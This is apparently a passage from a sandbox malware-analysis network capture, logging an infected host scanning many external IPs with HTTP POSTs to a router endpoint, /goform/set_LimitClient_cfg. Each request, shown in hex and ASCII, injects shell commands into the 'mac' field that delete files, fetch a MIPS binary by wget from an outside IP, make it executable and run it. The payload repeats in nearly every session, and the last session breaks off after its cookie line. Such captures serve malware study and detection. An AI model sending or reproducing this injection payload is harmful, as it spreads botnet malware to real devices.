                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1013192.168.2.235355439.249.54.2428080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.442229986 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1014192.168.2.2350086124.81.159.2138080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.442229986 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1015192.168.2.234790649.94.230.1488080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.442256927 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1016192.168.2.2350824150.242.97.448080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.442277908 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1017192.168.2.2359466113.112.166.188080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.442296028 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1018192.168.2.2344874145.243.243.1398080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.442317009 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1019192.168.2.234028019.105.239.938080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.442342043 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1020192.168.2.2339172201.162.171.1208080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.442362070 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1021192.168.2.233873893.128.244.808080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.442389011 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1022192.168.2.2343292150.142.82.1428080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.442420959 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1023192.168.2.235727637.134.202.2488080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.442456007 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1024192.168.2.235891834.90.100.98080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.442612886 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1025192.168.2.2360640112.103.226.58080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.442632914 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1026192.168.2.2354704150.55.239.1508080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.442663908 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1027192.168.2.2336150107.190.5.1888080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.442677975 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1028192.168.2.235164280.139.163.308080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.442706108 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1029192.168.2.2349496202.220.216.1388080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.442727089 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1030192.168.2.234649874.201.107.988080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.442758083 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1031192.168.2.2354624143.239.208.2338080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.442780018 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1032192.168.2.234267267.122.190.108080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.442800999 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1033192.168.2.234842476.214.64.1318080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.442830086 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1034192.168.2.233677295.77.119.1758080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.442840099 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1035192.168.2.2346256191.119.149.638080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.443037987 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
